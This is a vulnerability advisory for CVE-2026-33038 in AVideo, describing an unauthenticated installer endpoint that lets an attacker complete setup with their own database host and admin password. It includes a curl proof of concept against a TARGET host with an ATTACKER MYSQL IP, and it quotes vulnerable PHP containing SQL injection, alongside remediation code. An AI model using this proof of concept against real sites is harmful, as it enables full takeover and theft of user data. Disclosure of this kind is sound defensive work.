PT-2026-25996 · Packagist · Wwbn Avideo
Published
2026-03-17
·
Updated
2026-03-17
·
CVE-2026-33038
CVSS v3.1
8.1
| Vector | AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H |
Summary
The
install/checkConfiguration.php endpoint performs full application initialization — database setup, admin account creation, and configuration file write — from unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access.Affected Component
install/checkConfiguration.php— entire file (lines 1-273)
Description
No authentication or access restriction on installer endpoint
The
checkConfiguration.php file performs the most privileged operations in the application — creating the database schema, the admin account, and the configuration file — with no authentication, no setup token, no CSRF protection, and no IP restriction. The sole guard is a file-existence check:// install/checkConfiguration.php — lines 2-5
if (file exists("../videos/configuration.php")) {
error log("Can not create configuration again: ". json encode($ SERVER));
exit;
}If
videos/configuration.php does not exist (fresh deployment, container restart without persistent storage, re-deployment), the entire installer runs with attacker-controlled POST parameters.Attacker-controlled database host eliminates credential guessing
Unlike typical installer exposure vulnerabilities where the attacker must guess the target's database credentials, this endpoint allows the attacker to supply their own database host:
// install/checkConfiguration.php — line 25
$mysqli = @new mysqli($ POST['databaseHost'], $ POST['databaseUser'], $ POST['databasePass'], "", $ POST['databasePort']);The attacker can:
- Run their own MySQL server with the AVideo schema pre-loaded
- Set
databaseHostto their server's IP - The connection succeeds (attacker controls the DB)
- The configuration file is written pointing the application at the attacker's database permanently
Admin account creation with unsanitized input
The admin user is created with direct POST parameter concatenation into SQL:
// install/checkConfiguration.php — line 120
$sql = "INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', '"
. $ POST['contactEmail'] . "', '" . md5($ POST['systemAdminPass']) . "', now(), now(), true)";This has two issues: (1) the attacker controls the admin password, and (2)
$ POST['contactEmail'] is directly concatenated into SQL without escaping (SQL injection).Configuration file written with attacker-controlled values
The configuration file is written to disk with all attacker-supplied values embedded:
// install/checkConfiguration.php — lines 238-247
$videosDir = $ POST['systemRootPath'].'videos/';
if(!is dir($videosDir)){
mkdir($videosDir, 0777, true);
}
$fp = fopen("{$videosDir}configuration.php", "wb");
fwrite($fp, $content);
fclose($fp);The
$content variable (built at lines 188-236) embeds $ POST['databaseHost'], $ POST['databaseUser'], $ POST['databasePass'], $ POST['webSiteRootURL'], $ POST['systemRootPath'], and $ POST['salt'] directly into the PHP configuration file.Inconsistent defense: CLI installer is protected, web endpoint is not
The CLI installer (
install/install.php) properly restricts access:// install/install.php — lines 3-5
if (!isCommandLineInterface()) {
die('Command Line only');
}The web endpoint (
checkConfiguration.php) lacks any equivalent protection, creating an inconsistent defense pattern.No web server protection on install directory
There is no
.htaccess file in the install/ directory. The root .htaccess does not block access to install/. The endpoint is directly accessible at /install/checkConfiguration.php.Execution chain
- Attacker discovers an AVideo instance where
videos/configuration.phpdoes not exist (fresh or re-deployed) - Attacker sends POST to
/install/checkConfiguration.phpwith their own database host, admin password, and site configuration - The script connects to the attacker's database (or the target's with guessed/default credentials)
- Tables are created, admin user is inserted with attacker's password
configuration.phpis written to disk, permanently configuring the application- Attacker logs in as admin with full control over the application
Proof of Concept
Step 1: Set up an attacker-controlled MySQL server with the AVideo schema:
# On attacker's server
mysql -e "CREATE DATABASE avideo;"
mysql avideo < database.sql # Use AVideo's own schema fileStep 2: Send the installation request to the target:
curl -s -X POST https://TARGET/install/checkConfiguration.php
-d 'systemRootPath=/var/www/html/AVideo/'
-d 'databaseHost=ATTACKER MYSQL IP'
-d 'databasePort=3306'
-d 'databaseUser=attacker'
-d 'databasePass=attacker pass'
-d 'databaseName=avideo'
-d 'createTables=1'
-d 'contactEmail=attacker@example.com'
-d 'systemAdminPass=AttackerPass123!'
-d 'webSiteTitle=Pwned'
-d 'mainLanguage=en US'
-d 'webSiteRootURL=https://TARGET/'Step 3: Log in as admin:
Username: admin
Password: AttackerPass123!The attacker now has full administrative access. If using their own database, they control all application data.
Impact
- Full application takeover: Attacker becomes the sole admin with complete control
- Persistent backdoor via configuration: The
videos/configuration.phpfile is written with attacker-controlled database credentials, ensuring persistent access even after the attack - Data exfiltration: If pointing to the attacker's database, all future user data (registrations, uploads, comments) flows to the attacker
- Remote code execution potential: Admin access in AVideo enables file uploads and plugin management, which can lead to arbitrary PHP execution
- SQL injection bonus:
$ POST['contactEmail']on line 120 is directly concatenated into SQL, allowing additional database manipulation
Recommended Remediation
Option 1: Add a one-time setup token (preferred)
Generate a random setup token during deployment that must be provided to complete installation:
// At the top of install/checkConfiguration.php, after the file exists check:
// Require a setup token that was generated during deployment
$setupTokenFile = DIR . '/../videos/.setup token';
if (!file exists($setupTokenFile)) {
$obj = new stdClass();
$obj->error = "Setup token file not found. Create videos/.setup token with a random secret.";
header('Content-Type: application/json');
echo json encode($obj);
exit;
}
$expectedToken = trim(file get contents($setupTokenFile));
if (empty($ POST['setupToken']) || !hash equals($expectedToken, $ POST['setupToken'])) {
$obj = new stdClass();
$obj->error = "Invalid setup token.";
header('Content-Type: application/json');
echo json encode($obj);
exit;
}Option 2: Restrict installer to localhost/CLI only
Block web access to the installer entirely:
// At the top of install/checkConfiguration.php, after the file exists check:
if (!isCommandLineInterface()) {
$allowedIPs = ['127.0.0.1', '::1'];
if (!in array($ SERVER['REMOTE ADDR'], $allowedIPs)) {
header('Content-Type: application/json');
echo json encode(['error' => 'Installation is only allowed from localhost']);
exit;
}
}Additionally, add an
.htaccess file in the install/ directory:# install/.htaccess
<Files "checkConfiguration.php">
Require local
</Files>Additional fixes needed
- Parameterize SQL queries on line 120 to prevent SQL injection:
$stmt = $mysqli->prepare("INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', ?, ?, now(), now(), true)");
$hashedPass = md5($ POST['systemAdminPass']); // Also: upgrade from md5 to password hash()
$stmt->bind param("ss", $ POST['contactEmail'], $hashedPass);
$stmt->execute();- Upgrade password hashing from
md5()topassword hash()withPASSWORD BCRYPTorPASSWORD ARGON2ID.
Credit
This vulnerability was discovered and reported by bugbunny.ai.
Fix
Missing Authentication
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Wwbn Avideo